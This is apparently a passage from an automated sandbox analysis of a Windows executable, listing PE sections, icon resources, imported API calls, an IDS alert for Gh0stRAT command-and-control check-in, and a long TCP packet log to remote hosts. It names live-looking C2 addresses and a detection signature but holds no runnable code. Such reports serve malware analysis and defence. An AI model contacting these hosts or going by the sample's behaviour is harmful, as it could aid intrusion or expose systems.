.rdata	0x15000	0x4e56	0x5000	b7d0002bbe549a38d51d99b629abd7c7	False	0.35908203125	DIY-Thermocam raw data (Lepton 2.x), scale 25856-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 144115188075855872.000000, slope 40667568230564027410711129882624.000000	4.888468167231441	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0xf898	0xce00	cf329d927c171662ae38710dcbe91f2f	False	0.8344584344660194	data	7.496616209053428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2a000	0xf00	0x1000	2fbbb25ab9ec9b3523ad459ff62d93f2	False	0.4658203125	data	4.793756636152296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2b000	0xc458	0xc600	88a1fe97f1c51006b9a230be98f9b8b0	False	0.5527146464646465	data	5.714811098369205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x38000	0x4f4	0x600	5552b7f58d5c99ec1d08bcde17019af9	False	0.2942708333333333	data	2.8731752975984195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2b370	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.25426829268292683
RT_ICON	0x2b9d8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.3467741935483871
RT_ICON	0x2bcc0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.39549180327868855
RT_ICON	0x2bea8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.47297297297297297
RT_ICON	0x2bfd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.43150319829424305
RT_ICON	0x2ce78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.4598375451263538
RT_ICON	0x2d720	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.41647465437788017
RT_ICON	0x2dde8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.315028901734104
RT_ICON	0x2e350	0x46a3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809213073052038
RT_ICON	0x329f4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2254149377593361
RT_ICON	0x34f9c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.324812382739212
RT_ICON	0x36044	0x9e8	Device independent bitmap graphic, 25 x 48 x 32, image size 2496	English	United States	0.3592271293375394
RT_ICON	0x36a2c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3723404255319149
RT_GROUP_ICON	0x36e94	0xbc	data	English	United States	0.6063829787234043
RT_VERSION	0x36f50	0x3a0	data	English	United States	0.4547413793103448
RT_MANIFEST	0x372f0	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL	Import
KERNEL32.dll	CloseHandle, TerminateThread, CreateThread, GetFileAttributesW, CreateFileW, SetFileAttributesW, GetFileSize, FindFirstFileW, FindClose, ReadFile, WriteFile, FlushFileBuffers, GetModuleFileNameW, lstrcpynW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, LoadLibraryW, GetProcAddress, CreateProcessW, TerminateProcess, GetExitCodeProcess, GetCurrentProcess, SetEndOfFile, SetFileValidData, SetFilePointer, GetCommandLineA, MultiByteToWideChar, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, RtlUnwindEx, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetLastError, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, HeapAlloc, HeapFree, RaiseException, RtlPcToFileHeader, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, HeapReAlloc, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, MoveFileExW, GetCurrentThread, WideCharToMultiByte, VirtualAlloc
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
ADVAPI32.dll	RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegOpenKeyExW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T15:13:49.021028+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	49857	8.212.102.187	9000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 15:12:13.847867012 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:13.847918034 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:13.848009109 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:13.856924057 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:13.856936932 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.173593998 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.173670053 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.174654961 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.174701929 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.238003969 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.238018990 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.238331079 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.238375902 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.240770102 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.287344933 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.807219028 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.807308912 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:16.807404041 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.817073107 CET	49730	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:16.817099094 CET	443	49730	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:17.481347084 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:17.481379986 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:17.481535912 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:17.482013941 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:17.482033014 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:19.790934086 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:19.791007996 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:19.811394930 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:19.811405897 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:19.811661959 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:19.811666965 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.392694950 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.392725945 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.392750978 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.392767906 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.392777920 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.392817974 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.409252882 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.409310102 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.425730944 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.425790071 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.434294939 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.434354067 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.584089994 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.588896036 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.595132113 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.595221043 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.609951973 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.610025883 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.617499113 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.617567062 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.632226944 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.632348061 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.646994114 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.647048950 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.654588938 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.654643059 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.669414043 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.669483900 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.684150934 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.684216976 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.775607109 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.775748014 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.785770893 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.785871029 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.791984081 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.792042017 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.803675890 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.803754091 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.814567089 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.814646959 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.820005894 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.820084095 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.829914093 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.830008030 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.839910030 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.840006113 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.844933987 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.844993114 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.854937077 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.855036974 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.866631985 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.866691113 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.869755030 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.869815111 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.880630016 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.880693913 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.890506983 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.890569925 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.895725012 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.895782948 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.968096972 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.968169928 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.970118999 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.970179081 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.977761030 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.977826118 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.985091925 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.985171080 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.988750935 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.988809109 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992280006 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.992331028 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992341042 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.992386103 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.992397070 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992433071 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992672920 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992682934 CET	443	49732	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:20.992700100 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:20.992732048 CET	49732	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:21.031014919 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:21.031109095 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:21.031193972 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:21.031428099 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:21.031476974 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:23.893719912 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:23.893856049 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:23.894598007 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:23.894624949 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:23.894723892 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:23.894735098 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.475126028 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.475156069 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.475346088 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.475394964 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.475497961 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.491529942 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.491662025 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.508434057 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.508549929 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.746083975 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.746211052 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.761883020 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.761956930 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.770404100 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.770462990 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.787328005 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.787391901 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.804023981 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.804079056 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.813088894 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.813154936 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:24.829459906 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:24.829545021 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.006716013 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.006835938 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.014534950 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.014606953 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.029107094 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.029186010 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.039248943 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.039329052 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.046047926 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.046113968 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.057883024 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.057949066 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.070278883 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.070334911 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.076603889 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.076666117 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.088771105 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.088844061 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.101406097 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.101500988 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.107531071 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.107649088 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.120546103 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.120609999 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.132148981 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.132210016 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.201531887 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.201612949 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.266993046 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.267082930 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.274686098 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.274750948 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.282680035 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.282773972 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.286672115 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.286741018 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.294226885 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.294291019 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.302016973 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.302082062 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.305923939 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.306013107 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.306020975 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.306076050 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.321896076 CET	49736	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.321950912 CET	443	49736	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.352781057 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.352814913 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:25.352889061 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.353216887 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:25.353235006 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:27.567605019 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:27.567827940 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:27.568442106 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:27.568448067 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:27.568645954 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:27.568651915 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.123258114 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.123286963 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.123338938 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.123356104 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.123370886 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.123414993 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.139358997 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.139472008 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.147969007 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.148032904 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.148034096 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.148078918 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.148221970 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.148237944 CET	443	49739	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.148251057 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.148307085 CET	49739	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.161595106 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.161627054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:28.161706924 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.161920071 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:28.161936045 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:30.478271961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:30.478480101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:30.479199886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:30.479206085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:30.479422092 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:30.479427099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.096915007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.096939087 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.096992970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.097003937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.097019911 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.097065926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.105386019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.105459929 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.124721050 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.124800920 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.208162069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.208277941 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.463241100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.463395119 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.582907915 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.582972050 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.583054066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.584129095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.587775946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.587790966 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.587817907 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.587908983 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.703697920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.703772068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.711538076 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.711596012 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.721462965 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.721520901 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.726445913 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.726495981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.735985041 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.736044884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.745640993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.745709896 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.755204916 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.755258083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.760071039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.760127068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.769614935 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.769702911 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.779309988 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.779373884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.784274101 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.784369946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.793745041 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.793812990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.803417921 CET	443	49740	39.103.20.20	192.168.2.4
